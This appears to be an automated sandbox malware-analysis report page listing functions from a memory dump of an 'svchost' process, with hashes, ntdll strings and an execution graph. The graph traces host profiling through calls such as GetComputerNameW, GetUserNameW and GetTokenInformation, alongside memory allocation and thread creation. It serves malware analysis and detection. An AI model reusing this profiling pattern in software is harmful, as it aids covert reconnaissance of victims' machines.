                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1ee8d4dfd1c0b376ff5c8482859030c79dd521c769bf5c0e423878235c464d2f
                                        • Instruction ID: 5dde4f39399ffbcb89e53f09c5812cf7512857b0504eec7f22b9ae50fcd4ae15
                                        • Opcode Fuzzy Hash: 1ee8d4dfd1c0b376ff5c8482859030c79dd521c769bf5c0e423878235c464d2f
                                        • Instruction Fuzzy Hash: 57900221701404424140B26898849464046FBE1321799C121A4999555D865989655665
                                        Function 03572FA0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0e348a4369b9f01274df0dce38c20845552f1bc3f554748377c6b719431690f2
                                        • Instruction ID: 2a52f9024985625a35228607adf529c686776722854a82bee215f0148f9ee1b8
                                        • Opcode Fuzzy Hash: 0e348a4369b9f01274df0dce38c20845552f1bc3f554748377c6b719431690f2
                                        • Instruction Fuzzy Hash: C490023130180802D100B25858487870046D7D0312F99C011A916555AE8765C9916531
                                        Function 03572E30 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d4d8c247e94624f7080ba50ddc4764f40f93c74e649e8090d1c88e6472519728
                                        • Instruction ID: 68021ea4a0da35a5a17ebbc251a502f79cbe20acbb54d5c2031753f4ebbad56c
                                        • Opcode Fuzzy Hash: d4d8c247e94624f7080ba50ddc4764f40f93c74e649e8090d1c88e6472519728
                                        • Instruction Fuzzy Hash: 6E90022130140802D102B2585454646004AD7D1355FD9C012E542555AD87258A53A132
                                        Function 03572EE0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4466e5728bb890779200661bf0e38b72581c818b84f28d3acd28e8511bc5a467
                                        • Instruction ID: 957ebda07f91b14d52a41c8cbd5ace61a48632d2c21951bdcd93ff4b771760cc
                                        • Opcode Fuzzy Hash: 4466e5728bb890779200661bf0e38b72581c818b84f28d3acd28e8511bc5a467
                                        • Instruction Fuzzy Hash: DF90026130180803D140B65858446470046D7D0312F99C011A606555AE8B298D516135
                                        Function 03572E80 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 388da6fcac4a14600bcf289742667d1aadabd12a3c557ee136350d8449854584
                                        • Instruction ID: 2854e459298965992e089223f5fe7da0ffbabcac43467303c941df2e6f18af77
                                        • Opcode Fuzzy Hash: 388da6fcac4a14600bcf289742667d1aadabd12a3c557ee136350d8449854584
                                        • Instruction Fuzzy Hash: 5590022170140902D101B2585444656004BD7D0351FD9C022A502555AECB258A92A131
                                        Function 03572EA0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f6dd7023d4e10fe679fb034a46f6fda023c18e0241e22eda39165a57ae6960bd
                                        • Instruction ID: eeaaae0cd9df035439bb8455803262523354238797e057d89ff76932e5b38a24
                                        • Opcode Fuzzy Hash: f6dd7023d4e10fe679fb034a46f6fda023c18e0241e22eda39165a57ae6960bd
                                        • Instruction Fuzzy Hash: 1590027130140802D140B25854447860046D7D0311F99C011A9065559E87598ED56665
                                        Function 03573D70 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9a2f59726974d61c849b76853438de963c31a53820de89812c8530e497980c3
                                        • Instruction ID: 00dcf0199389df2eae0d2c9f1925f354bafe1838f0e757886f3747e147a580a0
                                        • Opcode Fuzzy Hash: f9a2f59726974d61c849b76853438de963c31a53820de89812c8530e497980c3
                                        • Instruction Fuzzy Hash: 1690023530140802D510B25868446860087D7D0311F99D411A442555DD875489A1A121
                                        Function 03572D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8337b097b2ae4b62bca3a4e6b87dfb40b3904bebf806f6004bedfa3e88184bd5
                                        • Instruction ID: a66a380f2618cf76aed092c2962f9eb370a9acc3360d389fd048201e447ead72
                                        • Opcode Fuzzy Hash: 8337b097b2ae4b62bca3a4e6b87dfb40b3904bebf806f6004bedfa3e88184bd5
                                        • Instruction Fuzzy Hash: 6590022931340402D180B258644864A0046D7D1312FD9D415A401655DCCA1589695321
                                        Function 03573D10 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 285eeaf31c5ff8db7ee729ab7021d81386f8c406f565827b0b888440d68e14f3
                                        • Instruction ID: dbdc6b4029b30cfd35f65941ee9d7fffc5e42aba63644e0838d67084707c9ee2
                                        • Opcode Fuzzy Hash: 285eeaf31c5ff8db7ee729ab7021d81386f8c406f565827b0b888440d68e14f3
                                        • Instruction Fuzzy Hash: 6A900231302405429540B3586844A8E4146D7E1312BD9D415A4016559CCA1489615221
                                        Function 03572D00 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 19d69f3689826c0121de0b80fd56ca17b2376ed5ad2333483b4d9718b66a6d09
                                        • Instruction ID: 286c42376383803e8eb65c63f6607b63e73c33051ad2f75a088a90b599c5f73b
                                        • Opcode Fuzzy Hash: 19d69f3689826c0121de0b80fd56ca17b2376ed5ad2333483b4d9718b66a6d09
                                        • Instruction Fuzzy Hash: 4390022130544842D100B6586448A460046D7D0315F99D011A506559ADC7358951A131
                                        Function 03572D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 79a638b3c366cdf25c270388efdddbc0e11318d457a420637c75b6566de9044a
                                        • Instruction ID: 02f3288c67d0b8e74ae7417ae34ee6e3f84eda75accf350528d982ea127402e2
                                        • Opcode Fuzzy Hash: 79a638b3c366cdf25c270388efdddbc0e11318d457a420637c75b6566de9044a
                                        • Instruction Fuzzy Hash: B790022130140403D140B25864586464046E7E1311F99D011E4415559CDA1589565222
                                        Function 03572DD0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e8dc8e4d837f76038781e3e591eea9fa3b80493b7cd226883a41c7bec0a9640f
                                        • Instruction ID: f2beaaa74330732e25fd8a08b949f1543cbd948280e184a31abf589d3ad3703d
                                        • Opcode Fuzzy Hash: e8dc8e4d837f76038781e3e591eea9fa3b80493b7cd226883a41c7bec0a9640f
                                        • Instruction Fuzzy Hash: FC900221342445525545F25854445474047E7E03517D9C012A5415955C86269956D621
                                        Function 03572DB0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: edda34ac59d482f2518c5f737391333381d2fa4c1f7f9f5da0158d92809da845
                                        • Instruction ID: a3a164afe3965c6718d33a1b705aafba5700447578cf289c2fbdf77623c35e5c
                                        • Opcode Fuzzy Hash: edda34ac59d482f2518c5f737391333381d2fa4c1f7f9f5da0158d92809da845
                                        • Instruction Fuzzy Hash: AF90023134140802D141B2585444646004AE7D0351FD9C012A4425559E87558B56AA61
                                        Function 03572C70 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7f43630e6e2dd0b9835160b37934e8f8b285751827890edcde4cbb50a200f53a
                                        • Instruction ID: 4d0691fd16245d2f77c510a439641c8e8bbd8c8539167eab49d681fad819afb8
                                        • Opcode Fuzzy Hash: 7f43630e6e2dd0b9835160b37934e8f8b285751827890edcde4cbb50a200f53a
                                        • Instruction Fuzzy Hash: 7C90023130148C02D110B258944478A0046D7D0311F9DC411A842565DD879589917121
                                        Function 03572C60 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0f08132bcb134343e2536a16f9449f81fb528c8d8431e6dfb50d774c24539a0c
                                        • Instruction ID: decfa182cbeb0519ed6a9cac113e0d3b81e508070b1074b323c03d067af35d85
                                        • Opcode Fuzzy Hash: 0f08132bcb134343e2536a16f9449f81fb528c8d8431e6dfb50d774c24539a0c
                                        • Instruction Fuzzy Hash: 3290023130140C42D100B2585444B860046D7E0311F99C016A4125659D8715C9517521
                                        Function 03572CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f60889ccc54b80a376c6cfa6bc0b4e880bc44ceda492098b3ab33bfa63036e6
                                        • Instruction ID: 6f0d43d299022d9232c0639f38956eec38078f7c25f7d61fb370a491fa29048d
                                        • Opcode Fuzzy Hash: 5f60889ccc54b80a376c6cfa6bc0b4e880bc44ceda492098b3ab33bfa63036e6
                                        • Instruction Fuzzy Hash: 4C90022170540802D140B25864587460056D7D0311F99D011A4025559DC7598B5566A1
                                        Function 03572CF0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e4f7342535343e9013b11766d526a8ed8ff16847892a66a9ccddad7e5efd5a6d
                                        • Instruction ID: c63b80de5b6123f48625cd16428ab6be014ed89060c02ba6d3b5350c4414ecfd
                                        • Opcode Fuzzy Hash: e4f7342535343e9013b11766d526a8ed8ff16847892a66a9ccddad7e5efd5a6d
                                        • Instruction Fuzzy Hash: D490023130140803D100B25865487470046D7D0311F99D411A442555DDD75689516121
                                        Function 03572CA0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 30639fd39c5e244f01f4df69e3b066ad90b7ab90f98a9e99a2a2d9c97e121878
                                        • Instruction ID: 95231c4e9910b48c213e678abe9171d474fcb96a18e340b89a50064e04fcba6b
                                        • Opcode Fuzzy Hash: 30639fd39c5e244f01f4df69e3b066ad90b7ab90f98a9e99a2a2d9c97e121878
                                        • Instruction Fuzzy Hash: 0A90023130140802D100B69864486860046D7E0311F99D011A902555AEC76589916131
                                        Function 03572C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                        • Instruction ID: cad0a385ede9b23490afbfd93d057d52bbb0fb07c7f233bc4f34809267bfc98b
                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                        • Instruction Fuzzy Hash:
                                        Function 03572890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                        • API String ID: 48624451-2108815105
                                        • Opcode ID: 28bc2a890088e73857be3e41f9d1a0cbe9ac56bba41fcf2287fcd78369d76d47
                                        • Instruction ID: 512c748b916199f3e699dd92a45fd2eaa41628d98beaeeed50ba4035a54a9085
                                        • Opcode Fuzzy Hash: 28bc2a890088e73857be3e41f9d1a0cbe9ac56bba41fcf2287fcd78369d76d47
                                        • Instruction Fuzzy Hash: E451E9B5A04616BFCF10DB9CF89097EF7B8BB48200B588969E4A5D7651D334DE40CBA0
                                        Function 03567630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                        Download Yara Rule
                                        Strings
                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 035A4725
                                        • ExecuteOptions, xrefs: 035A46A0
                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 035A4787
                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 035A4742
                                        • Execute=1, xrefs: 035A4713
                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 035A4655
                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 035A46FC
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                        • API String ID: 0-484625025
                                        • Opcode ID: e3bfaf553d4e3ce472fea08bb031be22e5fbbcd44d4297938f1525695b14371b
                                        • Instruction ID: b194caa1306dc0a56fbc8f4ce96d9a340e1ff2e38a31058a228338e9bb0a2d7b
                                        • Opcode Fuzzy Hash: e3bfaf553d4e3ce472fea08bb031be22e5fbbcd44d4297938f1525695b14371b
                                        • Instruction Fuzzy Hash: 3D510B756007197AEF20EAA9FC45FAE77B8FF48308F0404E9D505AB2B1D7709A458F90
                                        Function 0357B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID: __aulldvrm
                                        • String ID: +$-$0$0
                                        • API String ID: 1302938615-699404926
                                        • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                        • Instruction ID: d135196b6777541c468e469ca19b6bf304c7443fc87467950b63b72111212860
                                        • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                        • Instruction Fuzzy Hash: 8181A074E052499EDF24CE68F8917FEBBB6BF45350F1C465AD861AB3B0C73499408B90
                                        Function 0355F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                        Download Yara Rule
                                        Strings
                                        • RTL: Re-Waiting, xrefs: 035A031E
                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 035A02BD
                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 035A02E7
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                        • API String ID: 0-2474120054
                                        • Opcode ID: b0890b55a09e2c356123280ed92e4ca247d1c7635efe9bc57475c95ce100cd51
                                        • Instruction ID: 996607c9cf1c8a8b0cc1f366992d9890f20b06b7fcc29fc1ad8f5f6498e55843
                                        • Opcode Fuzzy Hash: b0890b55a09e2c356123280ed92e4ca247d1c7635efe9bc57475c95ce100cd51
                                        • Instruction Fuzzy Hash: D3E1AD30614B41DFD724CF28E894B2AB7E4BF84314F184A5AF9A58B2F1D774E945CB82
                                        Function 0356BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                        Download Yara Rule
                                        Strings
                                        • RTL: Re-Waiting, xrefs: 035A7BAC
                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 035A7B7F
                                        • RTL: Resource at %p, xrefs: 035A7B8E
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                        • API String ID: 0-871070163
                                        • Opcode ID: 484851e7f91c7dc8d224f22419ed96e60e4cfd72355c38c448f354eb5474ffaf
                                        • Instruction ID: 4ffa901796abf4111ed1101830993b978eb88aa0bd9ea1ffcac85e63781c905d
                                        • Opcode Fuzzy Hash: 484851e7f91c7dc8d224f22419ed96e60e4cfd72355c38c448f354eb5474ffaf
                                        • Instruction Fuzzy Hash: 1541E4353007069FD724DE69EC40B6AF7E9FF88710F140A2DE956DB6A0EB71E8058B91
                                        Function 0356B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                        Download Yara Rule
                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 035A728C
                                        Strings
                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 035A7294
                                        • RTL: Re-Waiting, xrefs: 035A72C1
                                        • RTL: Resource at %p, xrefs: 035A72A3
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                        • API String ID: 885266447-605551621
                                        • Opcode ID: 58e660390372ed924119729d12f7ebfdf04610fd6f76ec56548777584b97e25c
                                        • Instruction ID: a2f5a284ef6d26892f8723677aa72b0eba7da80b07989e7cce11ab120af9eb2c
                                        • Opcode Fuzzy Hash: 58e660390372ed924119729d12f7ebfdf04610fd6f76ec56548777584b97e25c
                                        • Instruction Fuzzy Hash: 7941E135600606ABD720DE69EC41F6AB7B6FF88710F140A29F955EB260DB21E812D7D1
                                        Function 03577D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID: __aulldvrm
                                        • String ID: +$-
                                        • API String ID: 1302938615-2137968064
                                        • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                        • Instruction ID: 98c82993e58af2e1058433f82f046f19b095697febd68c773b386de1f2d76932
                                        • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                        • Instruction Fuzzy Hash: DE91A170E002169FDF24DE69F981ABEB7B5FF88320F58455AEC65E72E0E73099418B50
                                        Function 03539126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $$@
                                        • API String ID: 0-1194432280
                                        • Opcode ID: 45f012babebe3db10ec301d992a0fc5be2643d0ee2d53b0f300d97a3ced99c71
                                        • Instruction ID: 0507b68d76dd675cc5941cafbec1a74bdf2af06b0945adc460446c8e8153e10f
                                        • Opcode Fuzzy Hash: 45f012babebe3db10ec301d992a0fc5be2643d0ee2d53b0f300d97a3ced99c71
                                        • Instruction Fuzzy Hash: CD8139B6D002699BDB35DF54DC44BEAB7B8BB48710F0445EAA909B7290D7709E80CFA0

                                        Execution Graph

                                        Execution Coverage:3.9%
                                        Dynamic/Decrypted Code Coverage:97.4%
                                        Signature Coverage:0%
                                        Total number of Nodes:77
                                        Total number of Limit Nodes:6
                                        execution_graph 5640 d28090 5643 d28075 5640->5643 5641 d28186 CloseHandle 5641->5643 5642 d280ca GetTokenInformation 5642->5643 5643->5641 5643->5642 5644 d280a7 5643->5644 5645 d281ad GetTokenInformation 5643->5645 5645->5643 5653 d257f0 5654 d255ac 5653->5654 5654->5653 5655 d255e4 5654->5655 5657 d43870 5654->5657 5658 d43876 5657->5658 5660 d43893 5658->5660 5661 d43720 5658->5661 5660->5654 5664 d30c42 5661->5664 5662 d437dd 5662->5660 5663 d2e050 VirtualAlloc 5663->5664 5664->5661 5664->5662 5664->5663 5626 d281b1 5629 d28075 5626->5629 5627 d28186 CloseHandle 5627->5629 5628 d280a7 5629->5627 5629->5628 5630 d281ad GetTokenInformation 5629->5630 5631 d280ca GetTokenInformation 5629->5631 5630->5629 5631->5629 5590 d25b42 5591 d25b07 5590->5591 5591->5590 5592 d25cdf CreateThread 5591->5592 5593 d25b68 5591->5593 5592->5593 5594 d254a0 5592->5594 5595 d254b5 5594->5595 5596 d25b00 5597 d25bba 5596->5597 5604 d352c0 5597->5604 5599 d25bc7 5603 d25bde 5599->5603 5609 d40080 5599->5609 5605 d352c6 5604->5605 5608 d352ce 5604->5608 5605->5608 5623 d2e050 5605->5623 5608->5599 5613 d40089 5609->5613 5610 d403e0 GetComputerNameW 5610->5613 5611 d40181 VirtualFree 5611->5613 5612 d2e050 VirtualAlloc 5612->5613 5613->5610 5613->5611 5613->5612 5614 d403bf GetUserNameW 5613->5614 5615 d25c7b 5613->5615 5616 d404d6 GetComputerNameW 5613->5616 5614->5613 5617 d28070 5615->5617 5616->5613 5619 d28075 5617->5619 5618 d28186 CloseHandle 5618->5619 5619->5618 5620 d281ad GetTokenInformation 5619->5620 5621 d280ca GetTokenInformation 5619->5621 5622 d280a7 5619->5622 5620->5619 5621->5619 5622->5603 5624 d2e0c3 5623->5624 5625 d2e0d8 VirtualAlloc 5624->5625 5625->5624 5646 d25860 5647 d352c0 VirtualAlloc 5646->5647 5648 d25869 5647->5648 5649 d40080 5 API calls 5648->5649 5650 d2587d 5649->5650 5651 d28070 3 API calls 5650->5651 5652 d25870 5651->5652 5632 d25b87 CreateThread 5633 d25b1c 5632->5633 5638 d25810 5632->5638 5634 d25d0d 5633->5634 5635 d25cdf CreateThread 5633->5635 5636 d25c01 5635->5636 5637 d254a0 5635->5637 5639 d25822 5638->5639 5693 d25b09 5694 d25b16 5693->5694 5695 d25d0d 5694->5695 5696 d25cdf CreateThread 5694->5696 5697 d25c01 5696->5697 5698 d254a0 5696->5698 5665 d255ef 5668 d255ac 5665->5668 5666 d43870 VirtualAlloc 5666->5668 5667 d255e4 5668->5666 5668->5667

                                        Executed Functions

                                        Function 00D252A0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
